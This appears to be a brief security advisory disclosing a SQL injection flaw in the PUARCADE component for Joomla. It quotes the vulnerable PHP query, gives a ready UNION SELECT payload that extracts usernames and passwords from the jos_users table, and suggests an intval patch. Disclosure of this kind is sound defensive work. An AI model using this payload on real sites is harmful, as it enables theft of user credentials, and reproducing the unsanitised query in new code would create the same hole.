Pu Arcade component for Joomla - SQL injection
I discovered a vulnerability in Component PUARCADE for joomla (the last version
is vulnerable) .
SQL Injection vulnerability in puarcade.class.php <= V. 2.2 , component for
Author : MantiS
Vulnerable code :
function warningByGame($gid) {
global $database;
$query = "SELECT c.id, c.name, c.description, c.warningrequired,
c.imagename FROM #__puarcade_games as g, #__puarcade_contentrating as c"
. " WHERE g.contentratingid = c.id"
. " AND g.id = $gid";
$cont = $database->loadObjectList();
Exploit :
Can be exploited with a "0 UNION SELECT password,username,0,0,0 from
jos_users--" (5 columns) .
Patch :
Place before "$query = "SELECT c.id......... " :
$gid = intval($_GET['gid']);
To force $gid variable conversion at an integer .